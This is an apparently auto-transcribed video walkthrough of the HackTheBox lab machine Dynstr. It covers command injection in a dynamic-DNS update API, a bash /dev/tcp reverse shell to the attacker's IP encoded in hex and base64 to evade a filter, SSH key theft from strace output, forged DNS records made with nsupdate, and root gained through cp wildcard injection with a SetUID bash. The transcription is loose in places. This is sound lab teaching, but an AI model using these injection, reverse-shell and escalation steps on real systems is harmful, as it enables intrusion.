What's going on YouTube? This is Ipsec. I'm doing Dynstr from HackThebox, which was an amazing box that showcased the power of dynamic DNS. JKR did a really good job at mirroring the API no IP uses, so you can use the same commands that you would to update your dynamic DNS on like no IP dynamicdns.com on this box. However, when he cloned the API, he introduced a command injection vulnerability, so within the dynamic DNS update, you can actually get code execution on the box to get a shell on it. Once you have a shell on the box, you poke around, you can find a SSH private key, but you can't log in because the authorized key file specifies you have to come from a specific DNS name. And the dynamic DNS key that's on the box does not have the ability to create that DNS name. So you poke around the config, find the correct key. You can then now create that host name and utilize the private key. So with all that being said, let's jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, OA output all formats, put in the nmap directory and call it Dynstr, and then the IP address of 10.10.10.244. This can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server, and furthermore, based upon 8.2p1 and for Ubuntu 02, we can guess this is going to be Ubuntu Bionic. So if I just go Google here and type for Ubuntu 02 and search Launchpad, we can see it, Launchpad's like Ubuntu's package repository, but we can see it's only uploaded to Ubuntu Focal, which if we scroll down after selecting Focal, that is Ubuntu 20. If this did say like 7.6p1 instead of that 8.2, chances are that would be a Ubuntu Bionic, which I think is version 18. Clicking on Bionic, scrolling down, that would be, yes, 18. The other thing we can get from that is this package was released on March 10th, which is about 7 months ago. So this box at time of release was relatively up to date. So chances are there's no CVEs in a package that's managed by APT. So let's take a look at the other things. We have 53 open, and nmap's telling us that is DNS, and the banner confirms it is DNS. And it being on TCP and not UDP, well, it is also on UDP, but I only scan TCP. The fact that DNS is listening on TCP means I'm probably going to want to look at things like DNSSEC or zone transfers. Big key on the zone transfer because it's easier to enumerate. We just can't begin enumerating it until we know what zones this box supports. And a zone, if you don't know, would be like Dynstr.htb. If we knew that was existing on this box, we could do a zone transfer like dig axfr at 10.10.10.244 Dynstr.htb. It says transfer failed, so that does not work. But that may not be the actual zone, so we'll just resume once we actually enumerate zones of this box. The next thing we have is 80, which is on HTTP, and that is just running Apache. So let's go take a look at Apache. So 10.10.10.244, and we get Dyna DNS. It's a homepage and it says awesome dynamic DNS, and suddenly the box listing on DNS is making sense. So scrolling down, we can see the services, and it's talking about how it's a provider for dynamic DNS, and it has the same API as noip.com, which I actually use a lot. If you don't know what dynamic DNS is, essentially, it's just a short-lived DNS name where your computer polls to. It's a short updated. It stays for much longer. But anyways, it's a way to get your IP address to a DNS name and keep it in case your IP changes. Now, I like this because my Edge firewalls can resolve DNS names. So like IP tables and pfSense support it. I know Palo Alto, pretty much everything supports whitelisting a DNS name. So my laptop has a dynamic DNS, and my pfSense box at home will whitelist certain ports for that laptop. So if somehow I lock myself out of the VPN remotely, well, I can SSH directly into my firewall from my laptop. Now, the dangerous thing with that is if I ever go to like a conference and use hotel Wi-Fi, my dynamic DNS updates the hotel's IP address. Anyone at that hotel now has a reverse lookup to my domain name and could access port 22 of my firewall. So there are some downsides to doing that, but I really hate being locked out of my home network, so that's why I have that there. But that's a complete big tangent. Let's talk about this box. So we probably should look up the API for no IP because it's giving us a few zones right here. We have DNS alias.htb, dynamic DNS.htb, and no IP. So the very first thing I want to do is test some zone transfers. So let's go back to that dig, and I'm going to test each of these to see if we can extract any extra names. A zone transfer on a dynamic DNS provider would be a pretty bad day. So we can just look at these, and it looks like nothing is leaking, or all these don't have anything. Since it says transfer failed and not like 0 results, I'm going to guess zone transfer is not enabled. We can see it's running in beta mode, and it has a username and password. DNS is the username, and DNS backwards is the password. It has statistics and previous clients. So also has an email, dyna.htb, so we could try testing dyna.htb to see if we can zone transfer that. We can't. So let's go look up no IP's APIs, and it says they use the same one. So I'm just going to Google no IP API, go to Google, and we can see it says integrate with it. And how do we do it? So it's doing an HTTP request, username : password at noip.com/nick, update, and specifying the host name and IP address. So if I send this and we change it to, let's see. Actually, the very first thing I want to do is just go to /nick and see what happens. So if I go to 10.10.10.244/nick, we get a blank page. If I do please subscribe, we get not found. So we know /nick does exist. And then the next thing we could do is update and see if update exists. And it says bad auth. So now we want to test username and password. So what we can do is let's go back to the home page, or I can just type it, but it was DNS as the username and DNS backwards as the password. So let's specify, let's just do this in curl. So curl DNS like that at, we should specify HTTP, put in quotes, 10.10.10.244/nick/update ? I think it's host, or is it host name? Host name. Host name is equal to please subscribe. If I can spell, I was thinking about that one. .ipsec.rocks. And IP is equal to 10.10.14.8. So we can see if we can register something, and we get bad auth. That's weird. I wonder if that's not how we specify username and password, or did I typo something? DYN-DNS, is it like something different? Oh, Dyna DNS. There we go. So now we get wrong domain, ipsec.rocks. So if we go back to this page, it supports a few aliases. So we have DNS alias.htb, dynamic DNS.htb, and no-ip.htb. So let's go and take a look at this. So I can say hostname is equal to ipsec.dynamicdns.htb. And it says good. So if I now go nslookup, say the server is 10.10.10.244, and we try do ipsec.dynamicdns.htb, it resolves to me, but I don't know exactly what this did. We could furthermore try that zone transfer. So is it down here? Here we go. And we called it dynamicdns.htb. Still can't do a zone transfer. So I don't know exactly what we have here. We can try just doing various bad characters, see if we can enumerate anything. I'm going to put like an exclamation point, and before I do bad characters, let's put it in single quotes. And we have NS update failed. And NS update, if we Google exactly what this program is, we'll see it's a dynamic DNS update utility. So we know it's using dynamic DNS to update. We could test for like command injection. So I'm going to try sleep +1. And we don't get anything. However, I think we need to URL encode this. I'm going to try backticks to see if that gets around it. And it's looking like it's taking a bit longer. So we can do time in this curl. So it takes 2 seconds with that sleep in. We can put sleep 0. And it's instantly. If I do sleep 2, I'm guessing it'll be like 3 or 4 seconds. So we have confirmed we have some type of code injection. So easier way to work around this instead of living in the command line is just send this to burp. So at this point, I'm going to do -p for proxy, HTTP, localhost 8080. Is it --proxy? There we go. That looks better. So let's go to proxy, send this into the repeater tab, and we can confirm it's still working. It's waiting on the request, and we should see within 4 seconds it comes back. If we do sleep 0, it works almost immediately. And the reason why the semicolons weren't working is because in, I don't know exactly. If we URL encode these, do they work? Control U. NS update failed. So for some reason, because we're probably breaking the code. So if I do semicolons and then that, let's see, semicolon, semicolon. Let's encode this. It failed. Let's put a comment. Still, I'm not sure exactly why we can't use semicolons. Must just be a bad character or I'm screwing something up. That's why I always test for multiple ways to do something. So right now I am testing a different code execution technique. I'm just highlighting these to make sure I don't have to URL encode it. And it looks like we can insert commands via backticks or this way. So 2 different ways we can do it. It looks like we just can't like break out of the command with a semicolon. So the next thing to do is try to get a reverse shell. So I'm going to try --c, then --i, dev tcp 10.10.14.8 /9001 0 and 1 like that. And then let's URL encode this payload. We can listen on a port, so nclvnp 9001, and we send the payload, and it does not work. We get wrong domain 10.10.14.8 9001. So what I'm going to try to do is I'm going to add a few characters here. So if I now, by adding 2 on this side, I'm testing if there's some type of truncation going on and it only accepts a certain number of characters. So I'm expecting if it does truncation, I won't see 10 and it'll begin with .14.8. And that's not what happened. It just still says 10.14.8. So now I'm guessing there's some type of delimiter in my actual command. And I'm looking at this, and we have periods, and it's using periods to identify domains. So chances are putting all these domains is what broke it. We can kill this reverse shell real quick, and I think I can show this a different way. So if I do ipsec.dynamic DNS like this, it lets me create this record, right? But if I try doing a subdomain, if I make ipsec a different domain like test, we get wrong domain test.dynamic.dns. So the code is validating we only have 3 levels, and our domain is the, I don't know if it's upper or lower level in DNS, but the subdomain is what we put. So we can't do 4 levels. And by doing 10.10.10, it's treating each of those as a subdomain or whatever it's called, and that's why it's failing. But lucky for us, IPs can be defined in many different ways. My favorite way to define an IP is hex, so we can just do IP to hex, go to Google, And if you don't know, check out the holiday video. It's a good old one. It's my first box I actually solved on HackThebox that goes over this type of encoding. But I'm just going here, converting it into hex, and we can do this. So 0A in hex is 10, or A is 10. So it's probably be better to do it here. This clipboard, there we go. So it's represented as 10.10.10. Wait. Oh, no, this is 14, 0E.8. Yep, 10.10.14.8. I was reading this as 0A for whatever reason. But yeah, so 10.10.14.8. So I don't even need to go to the website to encode that if I just like thought about my octet a little bit. So let's do 0x 10.10.14.8. And we should listen on 9001. And see LVMP 9001. And send this. That did not work. Uh-oh. Let's see. 0x 10.10.14.8 9001 0 and 1. I think that should have worked. Let's try and backticks. NS update failed. So what I'm going to do here is I'm going to un-URL encode this and look at the payload. I don't have a single quote here. I wonder if that was it. Control U. There we go. It was me doing a bad payload. I did not have a single quote. If I did not spot that with the eye, what I was about to do is just copy this entire thing. So if I copy that, whoops, let's copy, and I paste this into terminal, I'd see this, and then I'd be like, oh, I forgot the single quote. So that's what I was doing. I wasn't positive if I could actually use an IP this way. And if I had to work around this and I couldn't specify IPs this way, I would probably resort to a like base64 payload. So if I do the same shell that I did, and we just say echo, let's see, if I echo that, that's good. I actually don't need the bash.c doing this. And we can get rid of the hex. So 10.10.14.8. Okay, so base64-w0. And then we could do echo-n, this base64-d bash. So we could try something like this. I'm actually not positive it's going to work. I assume it is, but that's why I always like testing multiple things, because if it doesn't work, after I solve this box, I'm probably going to debug exactly why it failed, so I just know in the future. So we can try doing that payload. And then again, we have to URL encode it, send it, and we just get NS update failed. Do I have, because I had an extra quote, but it works that way too. So there's two different ways you could bypass whatever filter it had, or that period being a bad character. So let's go continue along on this box. I'm going to do python 3-c, import pty, pty.spawn, bin bash, control Z, stty, raw minus echo, fg, enter, enter, and then export term is equal to xterm, so I can clear the screen. So the very first thing I always like doing when I get in a web directory is looking at the source to see if there's any type of credentials. I don't know what this attribution.txt is. So I think this is just some type of credits linking where they took all the images from. Nice to see people giving credit. It's just putting blank index.html so you don't have directory listing enabled. So if we remove that file, can we do that? No, because it's owned by root. Do we own the directory? Nope, it's owned by root. But if we removed this file, then we went to /nic, it would just have the directory listing enable and show us that update is a file. If I look at update, it is file update, a PHP script. So that is ugly. Let's do base64 update. Actually, cat update nc 10.10.14.8 9001. And over here, nc lvnp 9001 to update.php. Okay, control C that. Vim update.php, and now we can view this a bit better. That's still weird how it has all those spaces, but okay. Server PHP auth password. So this is the like din DNS, then dyna DNS, or the username password we use. That's what this is pulling. Okay. So this is saying if these passwords aren't set, and then checking if they're equal to din DNS and din DNS backwards. So that's what that is. Let's see. This is a filter, validate IP. So right here, the script is checking if the zone is either these three. And if it's not, that's going to exit with that wrong domain thing. And then here we're doing a update DNS entry. So it's setting the server to localhost, setting the zone, update, deleting the entry, and then adding the new entry. And one of these, I'm guessing, is user controlled. Let's see. I'm guessing H is user controlled. So what I'd probably do here to analyze it is I take update.php and I'm going to grab this. I'm going to do php-a and we can say list H. Actually, I wonder if, yeah, I think they did list H D. And after I type this out, I know it's host name and domain. But let's do root.ipsec.rocks. If we specify that, and then print H, it should be root, and then D is ipsec.rocks. So that's how we know exactly what that code is doing. And since H we fully control, this is where we're actually doing the command injection. So let's see. %sd, next one, this is going to be host.domain. So this is where we're injecting right here, and also injecting right here because it uses H again. But yeah, we just have command execution in here, which is a system command. Hopefully that made sense. Then we have this etc bind DNS key. And because we have it doing the checks in the script, right off the bat, I want to see if I can create other entries. So I'm going to copy this, and we can try going back to a shell, and we can do, what is it, NS update. And then, actually, it's not NS update. We have to specify the key. So key, and that's the wrong clipboard. Oh, God. NS update -k, and it should be, let's see, key, etc bind DNS key. Okay, so we kind of just mimic exactly what it does. So the first thing is server 127.0.0.1, then it's setting the zone to %s. So let's see, that would be H. So this is going to be, let's do dynadns.htb, which was the email. And we can do the next, add ipsec.dynadns.htb. Was that actually an allowed one? I don't think it was. No, it was not one of those allowed. So add 30 in a, let's see, the next one should be IP address, so 10.10.14.8. So this is the record to add, and at the end, we specify send, and it says not auth. So we don't have permission to add this record to this zone. So it looks like the bind key that we're using is specific to the 3 zones up here. So let's try the same exact command. Instead of dyndns, we can do noip.htb, send, wait, not auth. I thought I could do that. I have no clue how this program is working. Let's see. Do I need that T1? So T1, maybe we need that. Copy, paste, send. I wonder what T1 is. Let's try the other one. Dyna DNS. Oh, it's probably because I had set the zone earlier. And I did not set the zone to no IP. So let's try this again. And instead of IPsec, we'll do IPsec2. And it doesn't work. So it looks like that was definitely related to me setting that zone command. So let's try IPsec here. Send. So that works. Let's add it to this record. And it looks like it just hangs whenever we try to update this Dyna DNS zone. Maybe it's the second time we're updating, so I'm just going to sanity check this. So let's just make sure this is the very first thing we send. And it still just hangs here. So I don't think we can update that zone. And again, at this point, don't know what it would buy us. Oh, there we go. Response to SOA query was unsuccessful. So we know it did not work. But at this point, it doesn't matter because all we're doing is testing a key that we saw in the web server. So the next thing I do is more recon on this box. So let's go into the home directory and we can see we can go into both of these. So let's try checking out the Dyna directory. And this is empty and they don't have any files. Let's look at bindmgr. And we have a few folders. So bindmgr is set only that user can read. We're www data, so we can't read that user.txt. But we can go into .ssh, and we have an IDRSA, but we can't read it. There is authorized key in this id.pub file. We can cat authorized keys, and we can see from a specific domain, they can use SSH. So right now we're looking for the IDRSA key. I'm going to check this support case folder, and we can see a few commands. So I'm going to cat each of these files and see what they have. And that is an ugly thing that just did a bunch of stuff spewed to the text, but I do see a SSH key. And looking up here, we have open at current working directory home bindmgr.sh IDRSA. So it is leaking that key, and I'm guessing this .script output each of these files or something because that was the output of an strace. So if I cat strace and we go up, we can see the key is there too. And the reason why I knew it was strace is because of just printing out the system call traces. The S stands for syscall. Or maybe it's system trace, but that's how I remember it. Let's copy this key. So I'm highlighting this all, copy, and then we can create the key here. So let's v bindmgr, paste the key. And then we just need to do a quick search and replace. So \n. I did 2 backslashes because I got to escape the first backslash. And I'm going to replace that with a return. Does that work? Looks like it does. And we have a pretty SSH key. Now, the one thing that a lot of people do when they copy and paste, and it's super annoying, but let's go back up here. If I just had copy and pasted by, oh, weird. I can't click and highlight. Reset. Can I highlight? I think catting that one file screwed up my terminal. So I can't do it. I'm not sure you can hear my mouse clicking, but I'm trying to highlight this text. But anyways, because we're in this weird copy mode, if I try to highlight this text, it's going to copy these line breaks here as well, when it should not copy the line breaks. So you'd have extra characters to filter out in VI. So it's always easier in tmux to copy by going into the copy mode, which I hit space. I'm not sure if that's default. I don't think it is, because I think default is Emacs mode, not Vim. But if you watch my tmux video, it goes over how I do this copy and pasting. But I digress. So let's try logging in with this. So sh-i bindmgr at 10.10.10.244. And we can. Now, the first step I do is quickly validate my key. And I can see the fingerprint I'm validating with is this JN one. Let's do SSH-Keygen. Is it -L? Bindmgr. Let's see. How do I validate? Fingerprint hash. I think I need a -F for input file. So -L, -F. Oh, I think the first reason I couldn't log in is it was an unprotected key file. So still can't log in. But if I look at this fingerprint, it is JN plus whatever. Let's go over to the SSH directory. I'm going to cat id rsa.pub. Actually, yeah. Cat that and cat authorized keys. And we can see the .pub key is the same as authorized keys. We just don't have that from yet. So I'm going to copy this public key. So copied it. Let's vsh.pub. I actually called it bindmgr, so let's bindmgr.pub. Just stay a little bit organized. I do SSH-Keygen -L-K bindmgr. -F. And then we can do .pub. And we see these fingerprints are identical. So we know we have the right SSH key. And again, that key's fingerprint is also sent with SSH. So if I do that SSH-IV thing, this is bindmgr. You can see SSH is sending the fingerprint of each key it has, and then getting this one, which is the last one, and then failing. But that is how SSH-Keygen authentication works. It takes all your public keys that you have in your box, sends them the fingerprint, and if the fingerprint can continue, then it sends more information. Forget what box we went over SSH handshakes in depth, but if you go to ipsec.rocks, I'm sure you can find it if you want to learn more about the SSH handshake. But right now we're on a mission to create that .infra domain name. So if we cat this authorized keys, we know we need .infra.dyna.htb. So what I'm going to do is I just want to put that down here because my clipboard is acting funny. So in case it goes off my history, I know exactly what I want. I'm also going to put that in a copy. So let's go back to var www HTML. Nick, and we can try this update again. So if we cat update, we want to do a ns update -t1-k etc bind ddns.key. And then we wanted to update add ipsec.infra.dyna.htb in a we need 30 in a 10 10 14. I think that has to be capital. 8 looks good. Send. And it's actually refused. So if we do it to a domain that it doesn't know about, it sends refused. The last time it had just said it couldn't look up because this box probably has no record of what dyna.htb is. So that's probably why that last lookup failed. Which is funny because that's the... Oh. I don't know what I was doing earlier, but that is what I was expecting. So we get this refuse message. So the next thing we can do is look for more SSH keys. And I'm going to reset again. Okay. Because my TTY was screwed up and I couldn't do things. So I'm going to go into the bind directory and look at other keys. And we have this ddns.key, which is the one we use, but we also have infra.key. So if I look at infra.key, we can see we can read this one as well. I'm just going to cat both of these. And we can see it is a different key, but the same exact type. So I'm going to do this ns update command again. Instead of specifying ddns.key, we'll specify infra.key. And it was, I think, add ipsec.infra.dyna.htb 30 in a 10 10 14 8. Send. And now we have a lookup. So if I do an ns lookup, server 10 10 10 244 ipsec.infra.dyna.htb, it returns back to me. So let's try SSHing in. So SSH-I bind manager at 10 10 10 244. But we still can't get in. And the reason why we can't is because SSH also depends on a reverse lookup. And reverse lookups, if we just do 10 10 14 8 to this server, or in this like in-addr.arpa thing. And each of these is going to be a zone. And this is just the IP address in reverse order. So what I want to do is create a reverse lookup. Let's see, can I do this off the top of my head? So add 8.14.10.10.in-adr-.arpa 30 in, and it's a PTR lookup. That's not right. I don't think it's ipsec.infra.dyna.htb, is it? Is this it? Send? Oh, 10 10 14 8. Hey, I did it right. So now we have this reverse lookup that is pointing to ipsec.infra.dyna.htb, and we've also created that record. So now when I do the same SSH command, we get in. And again, that's because we have satisfied this criteria of being on the infra domain. So now the next bet is, and if you were using like no IP and you wanted to like secure your home with this, you could point your lookup to be like your hostname.dindns.com. And then your SSH key will only work when you have that dynamic DNS record set to the correct IP. So that is something cool. And now the thing about that, may not want to do it because that'll only work when you're like externally and you have a WAN address. But if you're trying to SSH into a local box, you're going to SSH in and your IP is probably going to be like 192.168.1.2, but your record.infra.dyna.htb record's going to be the WAN address. So you'd have to do multiple froms here to allow your local subnet to also be allowed. Hope that makes sense. But the next thing, let's see. We're that user, so we can check sudo-l, and we can see we can run this script with no password. So I'm going to do vi local bin bindmgr.sh. Did I typo something? I did local, and I still don't have syntax highlighting because Vim is not installed. Okay, so I'm just going to send this file back to my box. So nc 10.10.14.8 9001, and the reason why is I just like to have syntax highlighting. This is bindmgr.sh. I need to do lvnp. Let's see. There we go. You can tell, like, the longer the video goes, the more mistakes I make. Just because it's, like, mentally taxing to talk and type at the same time. Come on. .sh. There we go. So now we have syntax highlighting. So what this is doing is it's checking if the file .version exists. And if it doesn't exist, it's going to exit with 42. And then it's going to check if, let's see. It's going to get the contents of .version and check if it's less than the contents of bindmgr directory.version. And if it is less than it, it's going to exit with 43. And that bindmgr directory is up here. So it's etc bind named.bindmanager. So the next piece here, it's going to do for file and print out each file. And then it's going to stage files with this cp command, and it's using a wildcard here. So this is where the actual exploit exists, is because it's doing a wildcard. And how a wildcard works in Bash is it just takes every file in that directory and puts it in as you typed it in the command. So if you had a file that was like root me, and if you specified this argument, it worked, then CP would treat this as the argument. That was a bad example. Let's do cd dev shm. We can go in here. We can do touch, and we can say does not exist. If I do ls, we can see that file, and we can do touch please subscribe. If I do ls now, we can see both those files. If I do ls stir, we actually get an error message because the stir treated this as an argument, which, yeah, does not work. It just thought we typed this command. It does not exit. I didn't even say exist. But this is what it thought we typed if I did that correctly and put the E there. So that is why that matters. And CP does have a preserve flag. Let's see. Preserve equals all. Let's see. -p. Let's see. Don't preserve. Well, that's what we want, but it's not telling us everything. The mode is specifically, that's going to be like the permissions. Ownership, we don't want to preserve, and timestamps doesn't matter. What I'm getting at here is when I do sudo, I am now the root user. So if it does a copy, it may be the owner of itself. We can actually just show you. Let's see. Let's remove does not exist. Does that work? RM does not exist. No! It's such a pain to remove these files. Escape, escape. RM does not exist. I think I typed it and forgot the T there. Let's see. RM / does not exit. There we go. Removed it. I typed that file, so that's probably why we're screwing up. Or maybe the / is what saved me. But it's how you can delete those, I guess. So let's add the... I guess let's not add any flags real quick. So let's do touch file, or we can echo 1.2.version, and then chmod all 7s on please subscribe. So if I look at that, bindmgr owns it, and it's got all the bits turned on. So let's now run that sudo command. So sudo user local bin bindmgr.sh, and let's look at etc bind named.bindmanager. We can see the permissions are whatever the umask is. So rwx, rxr, rx, and the owner is root and bind. So we want to preserve the owner. I wonder if we can just do -p then, because we want to preserve everything. So, oh, we don't want to preserve the owner, because if I do touch -p, I'm sorry, it's been a long day. But now if I run this command again, and we're going to have to update the version, so echo 2.version, and run that sudo again, lsla etc bind named bind manager. We preserve the owner, so the owner now is us. We don't want that. We want the owner still to be root. So if we do man cp preserve, let's see, attribute list. Does it have attribute list? attr l. Let's see, default is mode ownership timestamps. I wish it told me what mode and everything meant. I guess I have to do a lot of Googling or check a different man page to get what attribute list is. But we're going to preserve mode. So instead of -p, I want to do -- preserve equal mode. So now when I run the same sudo, etc bind name. I wonder why I could do that, because I didn't update the version. Oh well. But we can see root now owns the file, and it kept our special bits. So what we can do now is copy bin bash to a directory. And because we own this directory, or we own the file, we can do chmod 4755 on bash. And now when we look at the permissions, it is a SetUID binary, which means it will allow us to execute the SetUID command, which would escalate us to root only if root owned this binary. So if I do bash with -p now, it doesn't do anything because root doesn't own this binary. However, by doing this sudo command, where is sudo? Let's just sudo. Now I do lsla etc bind named.bindmanager. We now have bash with that SetUID bit, and root owns it. So all I have to do now is do bash -p here. If I don't do the -p, it's not going to do anything. So I specify -p, and I do ID. My effective ID is root, so I go into root, and we can now read root.txt. If you're curious what that -p actually means, I am too. I just muscle memory. So let's look at exactly what -p is. Let's see, if the shell It's not supplied. Let's see. If the shell is started with the effective user group ID not equal to the real user and the -p option is not supplied, whatever. I wonder what -p means. It's not POSIX. Let's see. Equal. That's not it. I actually don't know what the -p means. Let's just Google real quick. What does -p argument mean in bash? Let's see. That's not it. Let's Google explain bash. And let's try bash -p. Question mark. I know this flag is unique to some distros, so yeah. I'm not sure exactly what it's supposed to mean. I guess maybe the distro did not update the help. Really? I'm drawing a blank. -p, POSIX. I don't think it's --POSIX. Let's just exit a few times. ID. POSIX. Yeah. So I'm not exactly sure what that -p means, but I'm sure if you check the comments, someone will let you know, because I'm sure someone out there that watches the video knows exactly what -p means. But anyways, take care, guys, and I'll see you all next week.